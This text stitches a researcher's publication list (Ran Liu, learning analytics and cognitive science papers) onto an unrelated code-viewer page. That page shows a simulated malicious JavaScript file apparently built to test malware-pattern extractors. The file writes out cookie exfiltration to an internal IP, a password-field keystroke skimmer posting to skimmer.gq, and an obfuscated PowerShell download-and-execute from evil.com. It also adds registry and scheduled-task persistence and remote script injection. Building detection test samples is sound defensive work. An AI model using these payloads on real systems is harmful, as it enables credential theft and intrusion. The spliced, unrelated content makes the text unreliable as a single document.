Ran Liu

18 papers A 3B 9Journal 4Unranked 2
YearRankTypeTitle / Venue / Authors
2019 J jnl
Br. J. Educ. Technol.
Carolyn P. Rosé, Elizabeth A. McLaughlin, Ran Liu, Kenneth R. Koedinger
2019 J jnl
J. Comput. Assist. Learn.
Ran Liu, John C. Stamper, Jodi L. Davenport, Scott A. Crossley, Danielle S. McNamara, Kalonji Nzinga, Bruce Sherin
2018 J jnl
J. Learn. Anal.
Ran Liu, John C. Stamper, Jodi L. Davenport
2018 B conf
CogSci
Yunan Wu, Lori L. Holt, Ran Liu, Sung-Joo Lim
2017 B conf
EDM
Ran Liu, Kenneth R. Koedinger
2017 A conf
LAK
Ken Koedinger, Ran Liu, John C. Stamper, Candace Thille, Phil Pavlik
2017 conf
MMLA-CrossLAK@LAK
Ran Liu, John C. Stamper
2017 A conf
LAK
Scott A. Crossley, Ran Liu, Danielle S. McNamara
2017 B conf
EDM
Ran Liu, Kenneth R. Koedinger, John C. Stamper, Philip I. Pavlik Jr.
2017 B conf
EDM
Ran Liu, Kenneth R. Koedinger
2016 B conf
EDM
Ran Liu, Jodi L. Davenport, John C. Stamper
2016 A conf
LAK
Ran Liu, Rony Patel, Kenneth R. Koedinger
2016 B conf
CogSci
Rony Patel, Ran Liu, Kenneth R. Koedinger
2015 B conf
EDM
Christopher J. MacLellan, Ran Liu, Kenneth R. Koedinger
2015 B conf
EDM
Ran Liu, Kenneth R. Koedinger
2014 B conf
EDM
Ran Liu, Elizabeth A. McLaughlin, Kenneth R. Koedinger
2013 conf
IGIC
Garrett Kimball, Rodrigo Cano, Jingyi Feng, Lei Feng, Erica Hampson, Evan Li, Michael G. Christel, Lori L. Holt, Sung-Joo Lim, Ran Liu, Matthew Lehet
2011 J jnl
J. Cogn. Neurosci.
Ran Liu, Lori L. Holt
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";